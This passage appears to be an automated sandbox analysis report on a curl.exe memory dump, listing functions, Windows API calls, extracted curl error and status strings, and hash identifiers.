Instruction ID: 9cb62c7b0435b6a933bc65d6eae16251a2e2e5670b1ac0d38fdc0314ecc455b3
Opcode Fuzzy Hash: 1c040d91785db0d8f209e6b24edb27ca7e1a24069e8536de83636f8cddd94bba
Instruction Fuzzy Hash: 7DF18F72A0078485FF64DF22EA507EB27A5F799B84F444539DE598B79ADF38C60AC300

Function 000000013F4B1B00 Relevance: 14.2, Strings: 11, Instructions: 464COMMON

Download Yara Rule

Strings

%s in chunked-encoding, xrefs: 000000013F4B210F
Leftovers after chunking: % I64du bytes, xrefs: 000000013F4B1E1F
Malformed encoding found, xrefs: 000000013F4B20F6
Bad content-encoding found, xrefs: 000000013F4B20ED
Excess found in a read: excess = %zu, size = %I64d, maxdownload = %I64d, bytecount = %I64d, xrefs: 000000013F4B1E8D
we are done reading and this is set to close, stop send, xrefs: 000000013F4B21D0
Failed reading the chunked-encoded stream, xrefs: 000000013F4B209D
Excess found: excess = %zd url = %s (zero-length body), xrefs: 000000013F4B1CF0
Too long hexadecimal number, xrefs: 000000013F4B2108
Illegal or missing hexadecimal sequence, xrefs: 000000013F4B20FF
Out of memory, xrefs: 000000013F4B20E4

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID:
String ID: %s in chunked-encoding$Bad content-encoding found$Excess found in a read: excess = %zu, size = %I64d, maxdownload = %I64d, bytecount = %I64d$Excess found: excess = %zd url = %s (zero-length body)$Failed reading the chunked-encoded stream$Illegal or missing hexadecimal sequence$Leftovers after chunking: % I64du bytes$Malformed encoding found$Out of memory$Too long hexadecimal number$we are done reading and this is set to close, stop send
API String ID: 0-2983031399
Opcode ID: 755c89fb7edbe622375bee7e6580487aae65205be194f694c5def9aa4dee93a9
Instruction ID: 1113f0e331c24af66c92b54f8ba361001281bdc1230fd706d59d3a6d27c7d201
Opcode Fuzzy Hash: 755c89fb7edbe622375bee7e6580487aae65205be194f694c5def9aa4dee93a9
Instruction Fuzzy Hash: A822AD32A0478885FB65CF7589443EA27A1F385B98F44113ADE8A477EADB34CF42C380

Function 000000013F4B2C88 Relevance: 13.8, APIs: 1, Strings: 8, Instructions: 306COMMON

Download Yara Rule

APIs

atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,00000000,?,00000002,?,000000013F49C9C7), ref: 000000013F4B2F28

Strings

Clear auth, redirects scheme from %s to %s, xrefs: 000000013F4B2FA3
GET, xrefs: 000000013F4B30A1
Issue another request to this URL: '%s', xrefs: 000000013F4B3030
Switch from POST to GET, xrefs: 000000013F4B3133
Switch to %s, xrefs: 000000013F4B30BA
HEAD, xrefs: 000000013F4B309A
Maximum (%ld) redirects followed, xrefs: 000000013F4B30EF
Clear auth, redirects to port from %u to %u, xrefs: 000000013F4B2F50

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: atoi
String ID: Clear auth, redirects scheme from %s to %s$Clear auth, redirects to port from %u to %u$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET$Switch to %s
API String ID: 657269090-1748258277
Opcode ID: b93313f06b643e7f88f3a70b6248b011ea62c43cac4db158183e301e4226fefc
Instruction ID: d1a394f08d7f97f8ed71cd3df44962c0c105b9709397dd620c9f47cc8a0b85e6
Opcode Fuzzy Hash: b93313f06b643e7f88f3a70b6248b011ea62c43cac4db158183e301e4226fefc
Instruction Fuzzy Hash: 2ED1B032A0078985FB11DF3A94547EB27E1F788B98F48043DEE495B7A6DA34CB478390

Function 000000013F4BCBDC Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 407COMMON

Download Yara Rule

Strings

WDigest, xrefs: 000000013F4BCC4E, 000000013F4BCFCF
digest_sspi: MakeSignature failed, error 0x%08lx, xrefs: 000000013F4BCED8
schannel: InitializeSecurityContext failed: %s, xrefs: 000000013F4BD1D3
SSPI: couldn't get auth info, xrefs: 000000013F4BCC6F
Digest, xrefs: 000000013F4BCBE8

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID:
String ID: Digest$SSPI: couldn't get auth info$WDigest$digest_sspi: MakeSignature failed, error 0x%08lx$schannel: InitializeSecurityContext failed: %s
API String ID: 0-2436749399
Opcode ID: 2a5a99bfd0a92872fb976d69f0cbad93f89190c7f32708fac90c229b458bbe87
Instruction ID: f7825b9e342670c4141a501be4e967f42b68437f007477b3c47c57d0d57678ff
Opcode Fuzzy Hash: 2a5a99bfd0a92872fb976d69f0cbad93f89190c7f32708fac90c229b458bbe87
Instruction Fuzzy Hash: 9A125136B01B488AEB14DF25E4943DA37B4F748B98F104529EE4D47BAADF38CA56C740

Function 000000013F490F28 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 301COMMON

Download Yara Rule

APIs

fputs.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F490FCB

Strings

%3I64d, xrefs: 000000013F491122, 000000013F491164
%-3s %-3s %s %s %5I64d %5I64d %5I64d %s %s %s %s %5s, xrefs: 000000013F491367
DL% UL% Dled Uled Xfers Live Qd Total Current Left Speed, xrefs: 000000013F490FBD

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: fputs
String ID: %-3s %-3s %s %s %5I64d %5I64d %5I64d %s %s %s %s %5s$%3I64d$DL% UL% Dled Uled Xfers Live Qd Total Current Left Speed
API String ID: 1795875747-3331718919
Opcode ID: f60f63ab4fd1dd1aa093c2fe40b6a0adc895ad17f63c63c3a3d8c5104ab10c16
Instruction ID: 7e3e8b18dd9f55ae7a3085e1d37f5b9f3cf58bf7bc589786c25121ad7a643045
Opcode Fuzzy Hash: f60f63ab4fd1dd1aa093c2fe40b6a0adc895ad17f63c63c3a3d8c5104ab10c16
Instruction Fuzzy Hash: A3D1D272F05B809AEB05CBB9E8447DF77B5A794798F04423ADD4D57BA9DA38C24AC300

Function 000000013F49B840 Relevance: 9.2, APIs: 6, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a201da7097ba7804aed9908316c9a6f478442285286d24ebeb58017c6e4be436
Instruction ID: 916e217661454935df0e7cf3f36ab6e965e4483f4f459e49b25b8e5d1e95a006
Opcode Fuzzy Hash: a201da7097ba7804aed9908316c9a6f478442285286d24ebeb58017c6e4be436
Instruction Fuzzy Hash: 1191E132B14A8486FB55DB25E4447EB73A0F784B94F44513AEE5A17BA4DF38CB46CB00

Function 000000013F481AB0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 111COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F481AFE
fputs.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F481BD9

Strings

%*s, xrefs: 000000013F481AE9
#, xrefs: 000000013F481BCF
-=O=-, xrefs: 000000013F481B0A

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: __swprintf_lfputs
String ID: #$%*s$-=O=-
API String ID: 2972761690-742414071
Opcode ID: e0f3c137f3f633e4654859a412c2d647b3a759afbe71d52922b3f3b1b0653e4d
Instruction ID: 80e9da71ad4f5a27022041cf52d00888b4999542fee1154e02e0e1ae021eedfc
Opcode Fuzzy Hash: e0f3c137f3f633e4654859a412c2d647b3a759afbe71d52922b3f3b1b0653e4d
Instruction Fuzzy Hash: 2041B8327155808BE798CF29E59479977A1F788744F505239EB4983FA8D738E525CB00

Function 000000013F4D9C20 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34encryptionCOMMON

Download Yara Rule

APIs

CryptGetHashParam.ADVAPI32 ref: 000000013F4D9C49
CryptGetHashParam.ADVAPI32 ref: 000000013F4D9C6C
CryptDestroyHash.ADVAPI32 ref: 000000013F4D9C7B
CryptReleaseContext.ADVAPI32 ref: 000000013F4D9C8B

Strings

, xrefs: 000000013F4D9C4F

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: Crypt$Hash$Param$ContextDestroyRelease
String ID:
API String ID: 2110207923-3916222277
Opcode ID: 91e91ab008b767c8f05ef04f45e93c4004cb4d75842f0d656781fabd1f371227
Instruction ID: f82f6fc9058a1b175ba34212836b41c4edd8811716bfee3baa5886de0e9dc69b
Opcode Fuzzy Hash: 91e91ab008b767c8f05ef04f45e93c4004cb4d75842f0d656781fabd1f371227
Instruction Fuzzy Hash: E7018B36A2164086EB04CF61E4483AAB370F784FD9F188829EB0943696CF3CCA49CB40

Function 000000013F483434 Relevance: 7.6, APIs: 5, Instructions: 53processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.API-MS-WIN-CORE-TOOLHELP-L1-1-0 ref: 000000013F483474
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F483483
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 000000013F4834A1
Module32First.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-2 ref: 000000013F4834D3
Module32Next.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-2 ref: 000000013F4834FD

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: Module32$CloseCreateErrorFirstHandleLastNextSnapshotToolhelp32
String ID:
API String ID: 3822340588-0
Opcode ID: 49c6dfc2acd4c87636d5ca94b473e4b984134c6ac036ba5c13ff0e5f5ffd9ce1
Instruction ID: 1af43ed01b4b85c51a3501baf75bc95ebb898f211030c89cb632c7bf75a64e7f
Opcode Fuzzy Hash: 49c6dfc2acd4c87636d5ca94b473e4b984134c6ac036ba5c13ff0e5f5ffd9ce1
Instruction Fuzzy Hash: EC114231B0464081FA659B25E5883FB7391B789BB4F48433DD96D47AD6EF3DC68AC600

Function 000000013F4D9BD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32 ref: 000000013F4D9BEC
CryptCreateHash.ADVAPI32 ref: 000000013F4D9C0D

Strings

@, xrefs: 000000013F4D9BDC

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: Crypt$AcquireContextCreateHash
String ID: @
API String ID: 1914063823-2766056989
Opcode ID: f28ce8f2b2c7489b8206fc3d31480ca9e750317407cdf0dae748bc20fa13d9e8
Instruction ID: 009c39af05cbf005507f119d4f1d11b45691c56bebe9773b1a320cd8cd92e54c
Opcode Fuzzy Hash: f28ce8f2b2c7489b8206fc3d31480ca9e750317407cdf0dae748bc20fa13d9e8
Instruction Fuzzy Hash: C0E04875B2095183F7704B71E801F4B73D0E788B54F4441249B4C8BA55DF3DC286CB54

Function 000000013F49BDE0 Relevance: 4.8, Strings: 3, Instructions: 1022COMMON

Download Yara Rule

Strings

Hostname '%s' was found in DNS cache, xrefs: 000000013F49C120
Transfer was pending, now try another, xrefs: 000000013F49C2D3
operation aborted by pre-request callback, xrefs: 000000013F49C40B

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID:
String ID: Hostname '%s' was found in DNS cache$Transfer was pending, now try another$operation aborted by pre-request callback
API String ID: 0-929452361
Opcode ID: cc19a3940076d35c0bc2aab85a9186171d4400c791fec8c77cda3bb1f396c12d
Instruction ID: 560d3c58fb12decdee8f3dc3e91b50db126792edcb8a15e101385b915a424f4e
Opcode Fuzzy Hash: cc19a3940076d35c0bc2aab85a9186171d4400c791fec8c77cda3bb1f396c12d
Instruction Fuzzy Hash: AFA2BE32F046828AFB64DB7581543EF37A1A74AB88F048239DF5957B96DB34DA47C380

Function 000000013F4A2738 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 000000013F4A2744
WSAGetLastError.WS2_32(?,?,?,000000013F4B4348), ref: 000000013F4A2753

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLastrecv
String ID:
API String ID: 2514157807-0
Opcode ID: 9393d307f0e0c0d7e1402c169a6f424d85d55f259f760e78e46b93d9cc82a3fe
Instruction ID: 8b7320298f77864f7085e3eb08079dea177e1dcaf30fa08b54d501857a590ae5
Opcode Fuzzy Hash: 9393d307f0e0c0d7e1402c169a6f424d85d55f259f760e78e46b93d9cc82a3fe
Instruction Fuzzy Hash: DCE08672F1060683FF298774E4647BA32A4D754B35F144738E632891D4EA2C47965380

Function 000000013F4D9C9C Relevance: 1.5, APIs: 1, Instructions: 34encryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 000000013F4D9BD0: CryptAcquireContextA.ADVAPI32 ref: 000000013F4D9BEC
Part of subcall function 000000013F4D9BD0: CryptCreateHash.ADVAPI32 ref: 000000013F4D9C0D

CryptHashData.ADVAPI32(?,?,?,?,00000000,?,?,000000013F4D30A3), ref: 000000013F4D9CDE

Part of subcall function 000000013F4D9C20: CryptGetHashParam.ADVAPI32 ref: 000000013F4D9C49
Part of subcall function 000000013F4D9C20: CryptGetHashParam.ADVAPI32 ref: 000000013F4D9C6C
Part of subcall function 000000013F4D9C20: CryptDestroyHash.ADVAPI32 ref: 000000013F4D9C7B
Part of subcall function 000000013F4D9C20: CryptReleaseContext.ADVAPI32 ref: 000000013F4D9C8B

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
String ID:
API String ID: 3606780921-0
Opcode ID: 33903e9631ea68ba9b79ee1d2b37164bd7a9b8be6849851d7280006c9cb37690
Instruction ID: 6cfd5ab341ffdda5897243d06cb4709da454775c52dff56a2e4c764828f7baea
Opcode Fuzzy Hash: 33903e9631ea68ba9b79ee1d2b37164bd7a9b8be6849851d7280006c9cb37690
Instruction Fuzzy Hash: 52F0967171464446FA209B26F4917AB73A0F78CFD8F445139BE8D8BB86DE2CC6028B00

Function 000000013F4AE4F0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f0756801c119c3ca93350c31e5009191f05ee7f902fb0d32e5593b0c32e4de4
Instruction ID: 013c86004f79a43ebcadb4b00738426ac16a65c04ea70094cb21e9c92439422c
Opcode Fuzzy Hash: 5f0756801c119c3ca93350c31e5009191f05ee7f902fb0d32e5593b0c32e4de4
Instruction Fuzzy Hash: AF31B631C019448AFAEB867E92383DBE257AB41B48F7C873AD11734494F73E56CB9600

Function 000000013F48256C Relevance: 95.3, APIs: 76, Instructions: 280COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482587
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482597
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4825A5
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4825B3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4825C1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4825D8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4825EF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482600
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482614
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482628
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48263C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482650
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482664
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482678
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48268C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4826A0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4826B4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4826C8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4826DC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4826F0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482704
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482718
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48272C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482740
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482754
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482768
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48277C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48279C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4827B0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4827C4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4827E4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4827F2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482800
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48280D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48283E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482852
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482866
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48287A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48288E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4828A2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4828B6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4828CA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4828DE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4828F2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482906
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48291A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48292E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482942
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482956
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48296A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48297E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482992
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4829A6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4829BA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4829CE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4829E2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4829F6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482A0A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482A1E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482A32
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482A46
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482A5A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482A6E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482A82
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482A96
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482AAA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482ABE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482AD2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482AE6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482AF7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482B95
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482BA9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482BBD
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482BD1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482BE5
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482BF9

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
